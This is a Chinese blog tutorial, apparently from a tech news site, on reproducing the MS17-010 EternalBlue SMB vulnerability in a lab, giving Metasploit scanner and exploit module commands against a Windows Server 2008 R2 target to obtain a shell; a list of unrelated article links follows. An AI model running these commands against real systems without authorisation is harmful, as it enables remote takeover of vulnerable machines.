当前位置: 首页 > news >正文

MS17-010

漏洞原理

        永恒之蓝(EternalBlue)是美国国家安全局(NSA)开发的漏洞利用程序,于2017年4月14日被黑客组织Shadow Brokers泄漏。该工具通过445/TCP和139端口来利用SMB协议远程代码执行漏洞(MS17-010)对Windows系统进行攻击。可用于对个人计算机和服务器植入木马、挖矿病毒、勒索软件等恶意程序。只要用户主机开机联网,即可通过该漏洞控制用户的主机。不法分子就能在其电脑或服务器中植入勒索病毒、窃取用户隐私、远程控制木马等恶意程序。

影响版本

 目前已知受影响的 Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。

实验环境:

        攻击机:kali-linux-2021.3       (192.168.11.205)

        靶机:Windows server 2008 R2  (192.168.11.242)

攻击过程

1.通过Nessus扫描得到报告显示,该服务器存在MS17-010。接下来进行漏洞复现


使用nmap扫描主机

 可以看到靶机开放了445端口

进入msfconsole

用MS17-010搜索

search MS17-010

 3:模块是漏洞发现模块RCE,0:漏洞利用模块

两个配合着使用

先用漏洞发现模块发现漏洞

 

use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.11.242                  # 靶机IP
run

出现这行字表示发现漏洞

用漏洞利用模块拿到靶机shell

进入模块

use exploit/windows/smb/ms17_010_eternalblue
show options     # 查看参数
set rhost 192.168.11.242  # 设置靶机IP
run

拿到靶机shell

 

漏洞利用

 

 

 

http://www.xdnf.cn/news/817381.html

相关文章:

  • 运维最全微服务架构解析:优势、挑战与实践指南(1),2024年最新2024Linux运维进阶学习资料
  • [Datasheet S50卡]NXP S50卡读写细节说明
  • 解决程序缺少richtx32.ocx无法运行问题
  • qreader无法进入的解决方法
  • 技术文档:C语言多线程编程与同步机制
  • .net的winform中DialogResult属性的使用
  • 我收集的学习网站
  • X86(32位)与X64(64位)有什么区别,如何选择对应的操作系统和应用程序?
  • 命令提示符已被系统管理员停用。请按任意键继续……
  • IP电话的VoIP语音网关设计
  • 鸿蒙系统开发app入门系列-- 第一个demo
  • C语言·贪吃蛇游戏(上)
  • 巧妙从进程中判断出病毒和木马
  • nc命令用法举例【转】
  • “熊猫烧香”变种“金猪报喜”制作者落网
  • kustomize/kubectl自动镜像部署互联网企业规范化上线流程(下) —— k8s从入门到高并发系列教程 (七)
  • 时域抽样定理,信号重建,附带频域抽样定理
  • OA系统流程效率改进方案
  • Java:81-RabbitMQ详解
  • “绿坝—花季护航”使用全攻略
  • 鬼影病毒学习总结
  • js复制URL链接
  • response.setContentType()和response.setCharacterEncoding()使用区别及统一处理request和response编码
  • python 网盘搭建_超简单!基于Python搭建个人“云盘”
  • 【MFC】Ribbon界面开发(一)
  • 刷机介绍----超详细
  • 公司内部邮件格式范文
  • SpringBoot -- 软件许可(License)证书生成+验证+应用完整流程
  • 手把手教你安装 Fedora
  • 计算机系列之排序算法